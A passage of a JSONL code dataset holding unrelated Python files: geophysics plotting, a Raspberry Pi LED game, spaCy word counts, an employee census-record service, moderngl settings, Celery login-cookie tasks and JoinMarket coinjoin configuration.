3)\nplt.axis('scaled')\nplt.title('model 1 gravity anomaly (mGal) with 5% noise')\nlevels = giplt.contourf(yp , xp , field_gra1, nshape, 15)\ncb = plt.colorbar(orientation='horizontal')\ngiplt.contour(yp, xp, field_gra1, nshape,\n              levels, clabel=False, linewidth=0.1)\nplt.subplot(2, 2, 4)\nplt.axis('scaled')\nplt.title('model 1 total-field magnetic anomaly (nT) with 5% noise')\nlevels = giplt.contourf(yp , xp , field_mag1, nshape, 15)\ncb = plt.colorbar(orientation='horizontal')\ngiplt.contour(yp, xp, field_mag1, nshape,\n              levels, clabel=False, linewidth=0.1)\nplt.tight_layout()\nplt.show()","sub_path":"examples/matlab_bin.py","file_name":"matlab_bin.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"469439349","text":"import RPi.GPIO as GPIO\nimport time\nimport shelve\nimport random\n\nGPIO.setmode(GPIO.BCM)\n\nleds = [6, 5, 22, 27, 17]\nbutton1 = 24\nposition = 0\nincrement = 1\nscore = 0\nmaxScore = 5\n# these counters were referenced below without ever being initialized (NameError on first press)\npresses = 0\nhits = 0\n\nGPIO.setup(leds, GPIO.OUT, initial = 0)\nGPIO.setup(button1, GPIO.IN)\n\ndef flash(channel):\n    for i in range(0,5):\n        GPIO.output(leds[position], True)\n        time.sleep(.1)\n        GPIO.output(leds[position], False)\n        time.sleep(.1)\n    \nGPIO.add_event_detect(button1, GPIO.FALLING, callback=flash, bouncetime = 1200)\n\ntry:\n    print(\"REACT\")\n    while score < maxScore:\n        GPIO.output(leds[position], True)\n        time.sleep(.5 / (1.1**score))\n        if GPIO.event_detected(button1):\n            presses += 1\n            if position == 2:\n                score += 1\n                hits += 1\n                print(\"Hit! Your score is\", score)\n                time.sleep(1.1)\n            else:\n                score -= 1\n                print(\"Miss! 
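`matlab_bin.py` above stacks one sensitivity row per prism into a kernel and then forward-models the field as a matrix-vector product (the `np.mat(kk) * np.mat(...)` lines). A toy NumPy illustration of that d = K·m step, with made-up shapes rather than the script's real mesh:

```python
import numpy as np

rng = np.random.default_rng(0)
K = rng.random((3, 4))               # kernel: 3 observation points x 4 model cells
m = np.array([1.0, 0.0, 2.0, 0.5])   # per-cell property (density or magnetization)
d = K @ m                            # predicted anomaly at each observation point
print(d.shape)                       # (3,)
```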
Your score is\", score)\n time.sleep(1.1)\n GPIO.output(leds[position], False)\n position += increment\n if position == 0 or position == 4:\n increment *= -1\nexcept KeyboardInterrupt:\n print(\"\")\nfinally:\n GPIO.cleanup()\n","sub_path":"react.py","file_name":"react.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"97472494","text":"import matplotlib.pyplot as plt\nimport sys\nimport spacy\nimport numpy\nfrom collections import Counter\n\nimport sys\nsys.path.append('..')\n\nimport import_data_json as import_json\nimport mine_location_descriptions_json as mine_json\n\nnlp = spacy.load('nl_core_news_sm')\n\ndef word_count(input_data):\n words = []\n total_article_n = len(input_data)\n for article_n in range(total_article_n):\n total_sentence_n = len(input_data[article_n])\n for sentence_n in range(total_sentence_n):\n total_span_n = len(input_data[article_n][sentence_n])\n for span_n in range(total_span_n):\n add_tokens = False\n for token in reversed(input_data[article_n][sentence_n][span_n]):\n if token.text[:3] == 'LOC':\n add_tokens = True\n elif add_tokens and not(token.is_punct) and not(token.text[:3] == 'LOC'): #(token.pos_ == 'ADP'):\n words.append(token.lower_)\n return words\n\ndata_200 = import_json.import_data_json('../../data/flitsservice_trainset.json', 200)\ndataY = import_json.import_data_json('../../data/flitsservice_trainset.json', filepath_complex='../../data/flitsservice_trainset.csv', complex='Y')\n\n\ninput_data_200 = mine_json.get_location_descriptions_json(data_200, nlp)\ninput_dataY = mine_json.get_location_descriptions_json(dataY, nlp)\n\nwords_200 = word_count(input_data_200)\nwordsY = word_count(input_dataY)\n\nword_freq_200 = Counter(words_200)\nword_freqY = Counter(wordsY)\n\nprint(input_dataY)\nprint(\"Length:\", len(input_dataY))\nkeysY, valuesY = zip(*word_freqY.most_common(35))\nvalues_200 = []\nfor key in keysY:\n values_200.append(word_freq_200.get(key, 0))\n\nvaluesY_norm = [x / len(wordsY) for x in valuesY]\nvalues_200_norm = [x / len(words_200) for x in values_200]\n\nplt.bar( numpy.arange(len(valuesY_norm)) * 3, height=valuesY_norm, width=1.2, color = 'lightskyblue' )\nplt.bar( numpy.arange(len(values_200_norm)) * 3 + 1.2, height=values_200_norm, width=1.2, color = 'lightsalmon' )\nplt.subplots_adjust(left=0.07, bottom=0.38, right=0.99,top=0.99)\nplt.xticks(numpy.arange(len(valuesY_norm)) * 3, keysY, rotation=80)\nplt.ylabel('Distribution')\nplt.xlabel('35 most common words')\nplt.legend(['Complex subset of first 200 trainingset articles', 'First 200 trainingset articles'],loc=1)\nplt.show()\n","sub_path":"implementation/data_visualizations/word_distr_complex_first200.py","file_name":"word_distr_complex_first200.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"575604354","text":"from datetime import datetime\nimport csv\n\nfrom taa.helpers import UnicodeCsvWriter\nfrom taa.core import DBService\nfrom taa.core import db\nfrom taa.services import RequiredFeature\nfrom models import CaseCensus\nfrom census_import import CensusRecordParser\n\n\nclass CensusRecordService(DBService):\n __model__ = CaseCensus\n\n self_enrollment_link_service = RequiredFeature(\"SelfEnrollmentLinkService\")\n\n def _preprocess_params(self, kwargs):\n \"\"\"\n Convert the date columns to plain dates, not datetimes, so we don't\n get spurious UPDATES when merging records\n 
\"\"\"\n from sqlalchemy.inspection import inspect\n inspector = inspect(CaseCensus)\n for c in inspector.columns:\n if (type(c.type) == db.Date and\n c.name in kwargs and\n isinstance(kwargs[c.name], datetime)):\n kwargs[c.name] = kwargs[c.name].date()\n return kwargs\n\n def export_csv(self, file, census_records):\n writer = UnicodeCsvWriter(file)\n # Write the header row\n writer.writerow(self.get_csv_headers())\n # Write all the data\n for record in census_records:\n writer.writerow(self.get_csv_row_from_db_row(record))\n return writer\n\n def get_csv_headers(self):\n return [field.csv_column_name\n for field in CensusRecordParser.all_possible_fields]\n\n def get_csv_row_from_db_row(self, census_record):\n return [getattr(census_record, field.database_name)\n for field in CensusRecordParser.all_possible_fields\n ]\n\n def get_csv_row_from_dict(self, census_record):\n return [census_record.get(field.database_name, '')\n for field in CensusRecordParser.all_possible_fields]\n\n def format_ssn(self, ssn):\n if not len(ssn) == 9:\n return ssn\n return '{}-{}-{}'.format(ssn[:3], ssn[3:5], ssn[5:])\n\n def merge_census_data(self, case, file_data, replace_matching):\n \"\"\"\n Updates existing records and adds new. Matches based on SSN, and depending on\n :replace_matching, will do replace matches or skip over them.\n \"\"\"\n # Get existing census data indexed by SSN for matching\n existing = self.find(case_id=case.id).all()\n \n # The `if r.employee_ssn` makes sure we aren't matching on empty SSNs if some census records are missing SSNs.\n existing_by_ssn = {r.employee_ssn: r for r in existing if r.employee_ssn}\n # Parse the uploaded file and validate it. If we are in add-only mode,\n # pass in the existing SSN dict.\n parser = CensusRecordParser(case)\n parser.process_file(file_data,\n error_if_matching=(existing_by_ssn if\n not replace_matching else None))\n # Do the merge\n added = []\n updated = []\n for record in parser.get_valid_data():\n if record['EMP_SSN'] in existing_by_ssn:\n if replace_matching:\n # Update Existing\n updated_record = self.update_without_save(\n existing_by_ssn[record['EMP_SSN']],\n **parser.get_db_dict(record))\n updated.append(updated_record)\n else:\n # We are in \"Add-only\" mode, an error will have been added\n # already for this record\n continue\n else:\n # Add new census record\n added.append(\n self.add_record_from_upload(case,\n **parser.get_db_dict(record)))\n # Only commit the changes if we had no errors\n if not parser.errors:\n db.session.flush()\n valid_records = added + updated\n return parser.errors, valid_records\n\n def replace_census_data(self, case, file_stream):\n # Process the upload before deleting the current data\n parser = CensusRecordParser(case)\n parser.process_file(file_stream)\n # Bail out if any errors\n if parser.errors:\n valid_records = []\n return parser.errors, valid_records\n # Delete existing records for this case\n self.remove_all_for_case(case)\n # Add all uploaded records\n valid_records = [\n self.add_record_from_upload(case, **parser.get_db_dict(record))\n for record in parser.get_valid_data()]\n db.session.flush()\n return parser.errors, valid_records\n\n def add_record_from_upload(self, case, **data):\n data['is_uploaded_census'] = True\n return self.add_record(case, **data)\n\n def add_record(self, case, **data):\n \"\"\"\n Create and add to the DB session, but don't commit or flush the session\n for speed\n \"\"\"\n if case:\n data['case_id'] = case.id\n else:\n # Ad-hoc record\n data['case_id'] = None\n if 
'is_uploaded_census' not in data:\n data['is_uploaded_census'] = False\n # TODO: See if there are any other records that need a final \"cleaning\"\n # before being saved\n if 'spouse_birthdate' in data and not data['spouse_birthdate']:\n data['spouse_birthdate'] = None\n if not data.get('occupation_class', None):\n data['occupation_class'] = 'Default'\n record = self.new(**data)\n db.session.add(record)\n return record\n\n def remove_all_for_case(self, case):\n\n # Need to delete all links as well.\n # We do this here as well as CaseService delete_census_record for performance when replacing\n # a very large census.\n from taa.services.enrollments.models import SelfEnrollmentLink, SelfEnrollmentEmailLog\n\n # Delete all self enrollment links and email logs for this case\n db.session.query(SelfEnrollmentLink\n ).filter(SelfEnrollmentLink.census_record.has(CaseCensus.case_id == case.id)\n # It complains about not being able to evaluate the conditions in the Python session, so skip that here.\n ).delete(synchronize_session=False)\n db.session.query(SelfEnrollmentEmailLog\n ).filter(SelfEnrollmentEmailLog.census_record.has(CaseCensus.case_id == case.id)\n # It complains about not being able to evaluate the conditions in the Python session, so skip that here.\n ).delete(synchronize_session=False)\n\n # We don't try to delete for enrollments because we don't allow deleting all the\n # census records if enrollments exist\n\n # Delete the census for this case.\n self.find(case_id=case.id).delete()\n\n db.session.commit()\n\n def update_from_enrollment(self, record, data):\n \"\"\"\n Update the enrollment census with data that was potentially corrected\n while enrolling\n \"\"\"\n\n def convert_smoker_to_y_n(val):\n if val is None:\n return ''\n return 'Y' if val else 'N'\n\n employee = data['employee']\n spouse = data['spouse']\n children = data['children']\n # TODO: See if there are any other records that need a final \"cleaning\"\n # before being saved\n if 'birthdate' in spouse and not spouse['birthdate']:\n # Ensure date is NULL in DB, not \"\"\n data['spouse']['birthdate'] = None\n record.employee_ssn = self.strip_ssn(employee['ssn'])\n record.employee_first = employee['first']\n record.employee_last = employee['last']\n record.employee_gender = employee['gender']\n record.employee_birthdate = employee['birthdate']\n record.employee_email = employee['email']\n record.employee_phone = employee['phone']\n record.employee_street_address = employee['address1']\n record.employee_street_address2 = employee['address2']\n record.employee_city = employee['city']\n record.employee_state = employee['state']\n record.employee_zip = employee['zip']\n record.employee_height_inches = employee['height']\n record.employee_weight_lbs = employee['weight']\n record.employee_smoker = convert_smoker_to_y_n(employee['is_smoker'])\n record.spouse_ssn = self.strip_ssn(spouse['ssn'])\n record.spouse_first = spouse['first']\n record.spouse_last = spouse['last']\n record.spouse_gender = spouse['gender']\n record.spouse_birthdate = spouse['birthdate']\n record.spouse_email = spouse['email']\n record.spouse_phone = spouse['phone']\n record.spouse_street_address = spouse['address1']\n record.spouse_street_address2 = spouse['address2']\n record.spouse_city = spouse['city']\n record.spouse_state = spouse['state']\n record.spouse_zip = spouse['zip']\n record.spouse_height_inches = spouse['height']\n record.spouse_weight_lbs = spouse['weight']\n record.spouse_smoker = convert_smoker_to_y_n(spouse['is_smoker'])\n for i, child 
in enumerate(children):\n            child_num = i + 1\n            setattr(record, 'child{}_first'.format(child_num), child['first'])\n            setattr(record, 'child{}_last'.format(child_num), child['last'])\n            setattr(record, 'child{}_birthdate'.format(child_num),\n                    child['birthdate'])\n        db.session.flush()\n\n    def strip_ssn(self, ssn):\n        return ssn.strip().replace('-','') if ssn else ''\n\n    def serialize_with_tokens(self, case, census_records, url_root):\n        # Return record_id, ssn, and self-enroll token. If the self-enroll token does not exist, generate it.\n        out = []\n        for record in census_records:\n\n            # Get previously generated link if available\n            link = self.self_enrollment_link_service.get_for_census_record(record)\n            if link is None:\n                # Otherwise generate one\n                link = self.self_enrollment_link_service.generate_link(url_root, case, record)\n\n            out.append(dict(\n                id=record.id,\n                ssn=record.employee_ssn,\n                self_enroll_url=link.url if link else None,\n            ))\n\n        return out","sub_path":"taa/services/cases/census_records.py","file_name":"census_records.py","file_ext":"py","file_size_in_byte":10244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"575604354","text":"\"\"\"\nBag of settings values\n\"\"\"\nimport importlib\nimport types\nimport os\n\nfrom collections.abc import Iterable\nfrom pprint import pformat\nfrom typing import Union\n\n\nfrom moderngl_window.conf import default\nfrom moderngl_window.exceptions import ImproperlyConfigured\n\nSETTINGS_ENV_VAR = \"MODERNGL_WINDOW_SETTINGS_MODULE\"\n\n\nclass Settings:\n    \"\"\"\n    Bag of settings values. New attributes can be freely added at runtime.\n    Various apply* methods are supplied so the user has full control over how\n    settings values are initialized. This is especially useful for more custom usage.\n\n    Attribute names must currently be in upper case to be recognized.\n\n    Some examples of usage::\n\n        from moderngl_window.conf import settings\n\n        # Mandatory settings values\n        try:\n            value = settings.VALUE\n        except AttributeError:\n            raise ValueError(\"This settings value is required\")\n\n        # Fallback in code\n        value = getattr(settings, 'VALUE', 'default_value')\n\n        # Pretty printed string representation for easy inspection\n        print(settings)\n    \"\"\"\n    def __init__(self):\n        \"\"\"Initialize settings with default values\"\"\"\n        # Set default entries. Mainly for code completion\n        self.WINDOW = dict()\n        # Finders\n        self.PROGRAM_FINDERS = []\n        self.TEXTURE_FINDERS = []\n        self.SCENE_FINDERS = []\n        self.DATA_FINDERS = []\n        # Finder dirs\n        self.PROGRAM_DIRS = []\n        self.TEXTURE_DIRS = []\n        self.SCENE_DIRS = []\n        self.DATA_DIRS = []\n        # Loaders\n        self.PROGRAM_LOADERS = []\n        self.TEXTURE_LOADERS = []\n        self.SCENE_LOADERS = []\n        self.DATA_LOADERS = []\n\n        self.apply_default_settings()\n\n    def apply_default_settings(self) -> None:\n        \"\"\"\n        Apply keys and values from the default settings module\n        located in this package. 
This is to ensure we always\n        have the minimal settings for the system to run.\n\n        If replacing or customizing the settings class\n        you must always apply default settings to ensure\n        compatibility when new settings are added.\n        \"\"\"\n        self.apply_from_module(default)\n\n    def apply_settings_from_env(self) -> None:\n        \"\"\"\n        Apply settings from the MODERNGL_WINDOW_SETTINGS_MODULE environment variable.\n        If the environment variable is undefined no action will be taken.\n        Normally this would be used to easily be able to switch between\n        different configurations by setting env vars before executing the program.\n\n        Example::\n\n            import os\n            from moderngl_window.conf import settings\n\n            os.environ['MODERNGL_WINDOW_SETTINGS_MODULE'] = 'python.path.to.module'\n            settings.apply_settings_from_env()\n\n        Raises:\n            ImproperlyConfigured if the module was not found\n        \"\"\"\n        name = os.environ.get(SETTINGS_ENV_VAR)\n        if name:\n            self.apply_from_module_name(name)\n\n    def apply_from_module_name(self, settings_module_name: str) -> None:\n        \"\"\"\n        Apply settings from a python module by supplying the full\n        pythonpath to the module.\n\n        Args:\n            settings_module_name (str): Full python path to the module\n\n        Raises:\n            ImproperlyConfigured if the module was not found\n        \"\"\"\n        try:\n            module = importlib.import_module(settings_module_name)\n        except ModuleNotFoundError as ex:\n            raise ImproperlyConfigured(\n                \"Settings module '{}' not found. From importlib: {}\".format(\n                    settings_module_name,\n                    ex,\n                )\n            )\n\n        self.apply_from_module(module)\n\n    def apply_from_dict(self, data: dict) -> None:\n        \"\"\"\n        Apply settings values from a dictionary\n\n        Example::\n\n            >> from moderngl_window.conf import settings\n            >> settings.apply_from_dict({'SOME_VALUE': 1})\n            >> settings.SOME_VALUE\n            1\n        \"\"\"\n        self.apply_from_iterable(data.items())\n\n    def apply_from_module(self, module: types.ModuleType) -> None:\n        \"\"\"\n        Apply settings values from a python module\n\n        Example::\n\n            my_settings.py module containing the following line:\n            SOME_VALUE = 1\n\n            >> from moderngl_window.conf import settings\n            >> import my_settings\n            >> settings.apply_from_module(my_settings)\n            >> settings.SOME_VALUE\n            1\n        \"\"\"\n        self.apply_from_iterable(module.__dict__.items())\n\n    def apply_from_cls(self, cls) -> None:\n        \"\"\"\n        Apply settings values from a class namespace\n\n        Example::\n\n            >> from moderngl_window.conf import settings\n            >> class MySettings:\n            >>     SOME_VALUE = 1\n            >>\n            >> settings.apply_from_cls(MySettings)\n            >> settings.SOME_VALUE\n            1\n        \"\"\"\n        self.apply_from_iterable(cls.__dict__.items())\n\n    def apply_from_iterable(self, iterable: Union[Iterable, types.GeneratorType]) -> None:\n        \"\"\"\n        Apply (key, value) pairs from an iterable or generator\n        \"\"\"\n        if not isinstance(iterable, Iterable) and not isinstance(iterable, types.GeneratorType):\n            raise ValueError(\n                \"Input value is not a generator or iterable, but of type: {}\".format(type(iterable))\n            )\n\n        for name, value in iterable:\n            if name.isupper():\n                setattr(self, name, value)\n\n    def __repr__(self) -> str:\n        return \"\\n\".join(\"{}={}\".format(k, pformat(v, indent=2)) for k, v in self.__dict__.items() if k.isupper())\n\n\nsettings = Settings()\n","sub_path":"moderngl_window/conf/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"422826825","text":"# coding=utf-8\nfrom __future__ import absolute_import\nimport os\nimport sys\nfrom db.redisCurd import RedisQueue\nfrom 
send_msg.weinxin import Send_msg\n\nbase_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(base_dir)\nfrom logger.logger import log_v\nfrom celery import Task\n\nfrom platLogin.jdLogin.login import JDLogin  # JD (jd.com) login\n\nfrom celery import Celery\n\nrandomQueue = RedisQueue(\"jd_cookie\")\n\ncelery_app = Celery('task')\ncelery_app.config_from_object('celeryConfig')\n\nS = Send_msg()\n\ndl_dict = {\n    'jd': {\n        'cookie': '',\n        'loginClass': 'JDLogin',\n    },\n\n}\n\n\n# The three task run states\nclass task_status(Task):\n    def on_success(self, retval, task_id, args, kwargs):\n        log_v.info('task info -> id:{} , arg:{} , successful ..... Done'.format(task_id, args))\n\n    def on_failure(self, exc, task_id, args, kwargs, einfo):\n        log_v.error('task id:{} , arg:{} , failed ! error : {}'.format(task_id, args, exc))\n\n    def on_retry(self, exc, task_id, args, kwargs, einfo):\n        log_v.warning('task id:{} , arg:{} , retry ! info: {}'.format(task_id, args, exc))\n\n\n# Polling; celery 6.0 can be unstable on win10 and the connection sometimes drops\n@celery_app.task(base=task_status)\ndef get_cookie_status(platName=\"Erp\"):\n    try:\n        randomQueue.get_hash(platName).decode()\n        log_v.debug(f'[+] polling {platName} succeeded ..... Done')\n        return \"Erp polling succeeded\"\n    except Exception:\n        return \"Erp polling failed\"\n\n\n@celery_app.task(base=task_status)\ndef set_plat_cookie(platName, shopId=None):\n    log_v.debug(f\"[+] {platName} logging in\")\n    core = eval(dl_dict[platName]['loginClass'])(shopId=shopId)  # resolve the login class by name\n    result = core.run()\n    return result\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"630797449","text":"from __future__ import absolute_import, print_function\n\nimport io\nimport logging\nimport threading\nimport os\nimport binascii\nimport sys\n\nfrom ConfigParser import SafeConfigParser, NoOptionError\n\nimport bitcoin as btc\nfrom joinmarket.jsonrpc import JsonRpc\nfrom joinmarket.support import get_log, joinmarket_alert, core_alert, debug_silence\n\nlog = get_log()\n\n\nclass AttributeDict(object):\n    \"\"\"\n    A class to convert a nested Dictionary into an object with key-values\n    accessible using attribute notation (AttributeDict.attribute) instead of\n    key notation (Dict[\"key\"]). 
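# The task_status class above hooks Celery's task lifecycle. A minimal sketch
# of the same wiring, assuming Celery is installed; 'demo', LoggingTask and
# add() are illustrative names (no broker is needed just to define the tasks).
from celery import Celery, Task

demo_app = Celery('demo')

class LoggingTask(Task):
    def on_success(self, retval, task_id, args, kwargs):
        print('task {} succeeded with {}'.format(task_id, retval))

    def on_failure(self, exc, task_id, args, kwargs, einfo):
        print('task {} failed: {}'.format(task_id, exc))

@demo_app.task(base=LoggingTask)
def add(x, y):
    return x + y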
This class recursively sets Dicts to objects,\n allowing you to recurse down nested dicts (like: AttributeDict.attr.attr)\n \"\"\"\n\n def __init__(self, **entries):\n self.add_entries(**entries)\n\n def add_entries(self, **entries):\n for key, value in entries.items():\n if type(value) is dict:\n self.__dict__[key] = AttributeDict(**value)\n else:\n self.__dict__[key] = value\n\n def __setattr__(self, name, value):\n if name == 'nickname' and value:\n logFormatter = logging.Formatter(\n ('%(asctime)s [%(threadName)-12.12s] '\n '[%(levelname)-5.5s] %(message)s'))\n fileHandler = logging.FileHandler('logs/{}.log'.format(value))\n fileHandler.setFormatter(logFormatter)\n log.addHandler(fileHandler)\n\n super(AttributeDict, self).__setattr__(name, value)\n\n def __getitem__(self, key):\n \"\"\"\n Provides dict-style access to attributes\n \"\"\"\n return getattr(self, key)\n\nglobal_singleton = AttributeDict()\nglobal_singleton.JM_VERSION = 5\nglobal_singleton.nickname = None\nglobal_singleton.DUST_THRESHOLD = 2730\nglobal_singleton.bc_interface = None\nglobal_singleton.ordername_list = ['absoffer', 'reloffer']\nglobal_singleton.commitment_broadcast_list = ['hp2']\nglobal_singleton.maker_timeout_sec = 60\nglobal_singleton.debug_file_lock = threading.Lock()\nglobal_singleton.debug_file_handle = None\nglobal_singleton.blacklist_file_lock = threading.Lock()\nglobal_singleton.core_alert = core_alert\nglobal_singleton.joinmarket_alert = joinmarket_alert\nglobal_singleton.debug_silence = debug_silence\nglobal_singleton.config = SafeConfigParser()\nglobal_singleton.config_location = 'joinmarket.cfg'\nglobal_singleton.commit_file_location = 'cmttools/commitments.json'\nglobal_singleton.wait_for_commitments = 0\n\ndef jm_single():\n return global_singleton\n\n# FIXME: Add rpc_* options here in the future!\nrequired_options = {'BLOCKCHAIN': ['blockchain_source', 'network'],\n 'MESSAGING': ['host', 'channel', 'port'],\n 'POLICY': ['absurd_fee_per_kb', 'taker_utxo_retries',\n 'taker_utxo_age', 'taker_utxo_amtpercent']}\n\ndefaultconfig = \\\n \"\"\"\n[BLOCKCHAIN]\nblockchain_source = blockr\n#options: blockr, bitcoin-rpc, regtest\n# for instructions on bitcoin-rpc read\n# https://github.com/chris-belcher/joinmarket/wiki/Running-JoinMarket-with-Bitcoin-Core-full-node\nnetwork = mainnet\nrpc_host = localhost\nrpc_port = 8332\nrpc_user = bitcoin\nrpc_password = password\n\n[MESSAGING]\nhost = irc.cyberguerrilla.org\nchannel = joinmarket-pit\nport = 6697\nusessl = true\nsocks5 = false\nsocks5_host = localhost\nsocks5_port = 9050\n#for tor\n#host = 6dvj6v5imhny3anf.onion\n#onion / i2p have their own ports on CGAN\n#port = 6698\n#usessl = true\n#socks5 = true\n\n[TIMEOUT]\nmaker_timeout_sec = 30\nunconfirm_timeout_sec = 90\nconfirm_timeout_hours = 6\n\n[POLICY]\n# for dust sweeping, try merge_algorithm = gradual\n# for more rapid dust sweeping, try merge_algorithm = greedy\n# for most rapid dust sweeping, try merge_algorithm = greediest\n# but don't forget to bump your miner fees!\nmerge_algorithm = default\n# the fee estimate is based on a projection of how many satoshis\n# per kB are needed to get in one of the next N blocks, N set here\n# as the value of 'tx_fees'. This estimate is high if you set N=1, \n# so we choose N=3 for a more reasonable figure,\n# as our default. 
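# The AttributeDict described above boils down to one recursive step: wrap
# nested dicts so they can be read with dot notation. A stdlib-only sketch
# (AttrBag is an illustrative name, not the class above):
class AttrBag(object):
    def __init__(self, **entries):
        for key, value in entries.items():
            # Recurse so AttrBag.attr.attr works on nested dicts too.
            self.__dict__[key] = AttrBag(**value) if isinstance(value, dict) else value

cfg = AttrBag(**{'db': {'host': 'localhost', 'port': 5432}})
assert cfg.db.port == 5432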
Note that for clients not using a local blockchain\n# instance, we retrieve an estimate from the API at blockcypher.com, currently.\ntx_fees = 3\n# For users getting transaction fee estimates over an API\n# (currently blockcypher, could be others), place a sanity\n# check limit on the satoshis-per-kB to be paid. This limit\n# is also applied to users using Core, even though Core has its\n# own sanity check limit, which is currently 1,000,000 satoshis.\nabsurd_fee_per_kb = 150000\n# the range of confirmations passed to the `listunspent` bitcoind RPC call\n# 1st value is the inclusive minimum, defaults to one confirmation\n# 2nd value is the exclusive maximum, defaults to most-positive-bignum (Google Me!)\n# leaving it unset or empty defers to bitcoind's default values, ie [1, 9999999]\n#listunspent_args = []\n# that's what you should do, unless you have a specific reason, eg:\n# !!! WARNING !!! CONFIGURING THIS WHILE TAKING LIQUIDITY FROM\n# !!! WARNING !!! THE PUBLIC ORDERBOOK LEAKS YOUR INPUT MERGES\n# spend from unconfirmed transactions: listunspent_args = [0]\n# display only unconfirmed transactions: listunspent_args = [0, 1]\n# defend against small reorganizations: listunspent_args = [3]\n# who is at risk of reorganization?: listunspent_args = [0, 2]\n# NB: using 0 for the 1st value with scripts other than wallet-tool could cause\n# spends from unconfirmed inputs, which may then get malleated or double-spent!\n# other counterparties are likely to reject unconfirmed inputs... don't do it.\n\n#options: self, random-peer, not-self, random-maker\n# self = broadcast transaction with your own ip\n# random-peer = everyone who took part in the coinjoin has a chance of broadcasting\n# not-self = never broadcast with your own ip\n# random-maker = every peer on joinmarket has a chance of broadcasting, including yourself\ntx_broadcast = self\n\n#THE FOLLOWING SETTINGS ARE REQUIRED TO DEFEND AGAINST SNOOPERS.\n#DON'T ALTER THEM UNLESS YOU UNDERSTAND THE IMPLICATIONS.\n\n# number of retries allowed for a specific utxo, to prevent DOS/snooping.\n# Lower settings make snooping more expensive, but also prevent honest users\n# from retrying if an error occurs.\ntaker_utxo_retries = 3\n\n# number of confirmations required for the commitment utxo mentioned above.\n# this effectively rate-limits a snooper.\ntaker_utxo_age = 5\n\n# percentage of coinjoin amount that the commitment utxo must have\n# as a minimum BTC amount. 
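# The taker_utxo_amtpercent policy above is a plain percentage floor. A tiny
# worked example (the helper name is illustrative; amounts in satoshis,
# 1 BTC = 100,000,000 sat):
def minimum_commitment_amount(coinjoin_amount, amtpercent=20):
    # 20% of a 1 BTC coinjoin -> 20,000,000 sat (0.2 BTC), matching the figures below.
    return coinjoin_amount * amtpercent // 100

assert minimum_commitment_amount(100000000) == 20000000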
Thus 20 means a 1BTC coinjoin requires the\n# utxo to be at least 0.2 btc.\ntaker_utxo_amtpercent = 20\n\n#Set to 1 to accept broadcast PoDLE commitments from other bots, and\n#add them to your blacklist (only relevant for Makers).\n#There is no way to spoof these values, so the only \"risk\" is that\n#someone fills your blacklist file with a lot of data.\naccept_commitment_broadcasts = 1\n\n#Location of your commitments.json file (stores commitments you've used\n#and those you want to use in future), relative to root joinmarket directory.\ncommit_file_location = cmttools/commitments.json\n\"\"\"\n\n\ndef get_irc_mchannels():\n fields = [(\"host\", str), (\"port\", int), (\"channel\", str),\n (\"usessl\", str), (\"socks5\", str), (\"socks5_host\", str),\n (\"socks5_port\", str)]\n configdata = {}\n for f, t in fields:\n vals = jm_single().config.get(\"MESSAGING\", f).split(\",\")\n if t == str:\n vals = [x.strip() for x in vals]\n else:\n vals = [t(x) for x in vals]\n configdata[f] = vals\n configs = []\n for i in range(len(configdata['host'])):\n newconfig = dict([(x, configdata[x][i]) for x in configdata])\n configs.append(newconfig)\n return configs\n\n\ndef get_config_irc_channel(channel_name):\n channel = \"#\" + channel_name\n if get_network() == 'testnet':\n channel += '-test'\n return channel\n\n\ndef get_network():\n \"\"\"Returns network name\"\"\"\n return global_singleton.config.get(\"BLOCKCHAIN\", \"network\")\n\n\ndef get_p2sh_vbyte():\n if get_network() == 'testnet':\n return 0xc4\n else:\n return 0x05\n\n\ndef get_p2pk_vbyte():\n if get_network() == 'testnet':\n return 0x6f\n else:\n return 0x00\n\n\ndef validate_address(addr):\n try:\n ver = btc.get_version_byte(addr)\n except AssertionError:\n return False, 'Checksum wrong. Typo in address?'\n if ver != get_p2pk_vbyte() and ver != get_p2sh_vbyte():\n return False, 'Wrong address version. 
Testnet/mainnet confused?'\n if len(btc.b58check_to_bin(addr)) != 20:\n return False, \"Address has correct checksum but wrong length.\"\n return True, 'address validated'\n\ndef donation_address(reusable_donation_pubkey=None):\n if not reusable_donation_pubkey:\n reusable_donation_pubkey = ('02be838257fbfddabaea03afbb9f16e852'\n '9dfe2de921260a5c46036d97b5eacf2a')\n sign_k = binascii.hexlify(os.urandom(32))\n c = btc.sha256(btc.multiply(sign_k,\n reusable_donation_pubkey, True))\n sender_pubkey = btc.add_pubkeys([reusable_donation_pubkey,\n btc.privtopub(c+'01', True)], True)\n sender_address = btc.pubtoaddr(sender_pubkey, get_p2pk_vbyte())\n log.debug('sending coins to ' + sender_address)\n return sender_address, sign_k\n\ndef check_utxo_blacklist(commitment, persist=False):\n \"\"\"Compare a given commitment (H(P2) for PoDLE)\n with the persisted blacklist log file;\n if it has been used before, return False (disallowed),\n else return True.\n If flagged, persist the usage of this commitment to the blacklist file.\n \"\"\"\n #TODO format error checking?\n fname = \"blacklist\"\n if jm_single().config.get(\"BLOCKCHAIN\", \"blockchain_source\") == 'regtest':\n fname += \"_\" + jm_single().nickname\n with jm_single().blacklist_file_lock:\n if os.path.isfile(fname):\n with open(fname, \"rb\") as f:\n blacklisted_commitments = [x.strip() for x in f.readlines()]\n else:\n blacklisted_commitments = []\n if commitment in blacklisted_commitments:\n return False\n elif persist:\n blacklisted_commitments += [commitment]\n with open(fname, \"wb\") as f:\n f.write('\\n'.join(blacklisted_commitments))\n f.flush()\n #If the commitment is new and we are *not* persisting, nothing to do\n #(we only add it to the list on sending io_auth, which represents actual\n #usage).\n return True\n\n\ndef load_program_config():\n #set the location of joinmarket\n jmkt_dir = 